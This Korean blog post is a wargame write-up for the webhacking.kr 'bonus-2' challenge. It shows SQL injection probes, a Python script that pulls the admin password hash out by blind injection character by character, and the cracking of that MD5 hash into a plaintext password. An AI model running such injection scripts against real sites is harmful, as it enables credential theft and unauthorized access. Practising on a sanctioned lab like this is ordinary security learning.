admin으로 로그인 해야하고
컬럼명은 id와 pw
id: guest
pw: guest
로그인하니 pw가 해싱되어있음
injection이 가능한지
id: guest' and 1=1#
pw: 1234
로 해봄
id: guest' and 1=2#
pw: 1234
로 했을 때
블라인드 인젝션이 가능함
id: admin' and length(pw)=32#
pw: 1234
admin의 pw도 해싱되어있는 것 같음
import requests
url = "https://webhacking.kr/challenge/bonus-2/index.php"
session = requests.Session()
cookie={"PHPSESSID":"gfphkap47rugn7sgmm59tukl35"}
password = ""
for i in range(1,33):
for j in range(43,127):
data={"uuid":"admin' and substr(pw,"+str(i)+",1)='"+chr(j)+"'#","pw":"1234"}
req=session.post(url,data=data,cookies=cookie)
if("Wrong password!" in req.text):
password +=chr(j)
print(chr(j)+"is Correct!!!")
break
print(chr(j))
print(password)
print(password)
admin pw의 해쉬 값
6C9CA386A903921D7FA230FFA0FFC153
https://www.md5online.org/md5-decrypt.html
여기서 처음에
guest의 해쉬값을 decryption하면
원래의 pw인 guest에 apple이 추가되어 해쉬된걸 알 수 있음
admin의 pw도 해보면
wowapple로 나온다
admin의 pw는 wow
'Wargame, CTF > webhacking.kr' 카테고리의 다른 글
Webhacking.kr 45번 (0) | 2020.01.03 |
---|---|
Webhacking.kr 40번 (0) | 2020.01.03 |
Webhacking.kr 2번 (0) | 2020.01.02 |
Webhacking.kr 50번 (0) | 2020.01.02 |
Webhacking.kr 4번 (0) | 2019.12.27 |